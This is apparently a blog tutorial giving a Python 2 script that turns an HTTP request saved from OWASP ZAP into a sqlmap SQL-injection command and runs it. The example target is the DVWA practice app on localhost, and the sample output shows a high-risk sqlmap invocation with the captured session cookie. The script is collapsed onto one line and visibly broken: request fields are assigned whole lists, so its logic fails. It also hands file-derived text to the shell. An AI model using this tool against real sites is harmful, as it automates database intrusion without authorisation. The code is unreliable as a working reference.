Below is a screen shot of OWASP ZAP area where the request is shown after it is configured to show a combined view of the header and the content.
This is an example of an HTTP POST request during the login stage of getting into DVWA. Then inside this box you can right-click, hover over Save Raw, Request, and then click on All. This will bring up a save dialog box. Where you saved the below script, create a folder called "requests". Then save the HTTP Request in that folder. If you are running Kali you do not need to be root to execute this script.
Here is the script that converts the POST Request into a sqlmap command and then it will execute it upon a key press:
#!/usr/bin/python import os import sys additionalParameters='--dbms=mysql --level=5 --risk=3' def checkDir(): if not (os.path.exists("requests")): print "This must be the first time you have used this script." print print "Creating a directory called 'requests'. This is where" print "you can save the web requests you would like formatted" print "for sqlmap." print os.makedirs("requests") def getFileName(): if (len(os.listdir('requests')) == 0): print "Inside this directory is another directory called requests." print "Currently this directory is empty, please add to this directory" print "the saved web requests that you would like formatted for sqlmap." print print "Example: In OWASP ZAP 2.4 where the web request is located," print "change the display to be combined with the header and the" print "body. Then right-click and Save Raw --> Request --> All." print "Then navigate to the requests directory and save it. You" print "can save more than one file and then select which one to" print "format." print else: print "Select which file to format:" files = os.listdir('requests') count = 1 for f in files: print str(count) + ". " + f count += 1 print fileNum = raw_input ("$ ") fileNum = int(fileNum) - 1 return files[fileNum] def parseFilename(fileName): fileName = 'requests/' + fileName file = open(fileName, 'r') # Count the number of lines in the file lineCount = 0 for count in file: lineCount += 1 file = open(fileName, 'r') count = 0 requestType = '' cookieInfo = '' for line in file: count += 1 if "POST" in line: lineList = line.split(' ') requestType = lineList url = lineList elif "GET" in line: lineList = line.split(' ') requestType = lineList url = lineList elif "User-Agent: " in line: userAgent = line[12:-2] elif "Cookie: " in line: cookieInfo = line[8:-2] elif (count == lineCount) & (requestType == 'POST'): dataInfo = line dataInfo = dataInfo[:-2] print sqlMapString = "sqlmap -u '" sqlMapString += url + "' " if (requestType == 'POST'): sqlMapString += "--data='" + dataInfo + "' " if (cookieInfo <> ''): sqlMapString += "--cookie='" + cookieInfo + "' " sqlMapString += "--headers='" + userAgent + "' " sqlMapString += " " + additionalParameters print print "# Additional Parameters of " + additionalParameters print "# These can be modified in the first few lines of the script" print print sqlMapString print return sqlMapString def executeCommand(c): raw_input ("Hit any key to execute the above sqlmap command.") os.system(c) def main(): print print "## SQLMap Format Script" checkDir() openFilename = getFileName() sqlmapCommand = parseFilename(openFilename) executeCommand(sqlmapCommand) if __name__ == "__main__": main()
After you execute the above script you get the following output:
$ ./sqlmap-tool.py ## SQLMap Format Script Select which file to format: 1. requests-1678.raw 2. requests-1665.raw 3. requests-1664.raw $ 1 # Additional Parameters of --dbms=mysql --level=5 --risk=3 # These can be modified in the first few lines of the script sqlmap -u 'http://127.0.0.1/dvwa/login.php' --data='username=admin&password=password&Login=Log' --cookie='security=high; PHPSESSID=ec135ql5k3j6irk2j0ammp5l94' --headers='Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.8.0' --dbms=mysql --level=5 --risk=3 Hit any key to execute the above sqlmap command.
If you place more than one file in the 'requests' directory, as shown above you can choose which file you would like to format and then upon key press execute the command. One item to note is the additional parameters. These can be adjusted by modifying the respective line in the python script.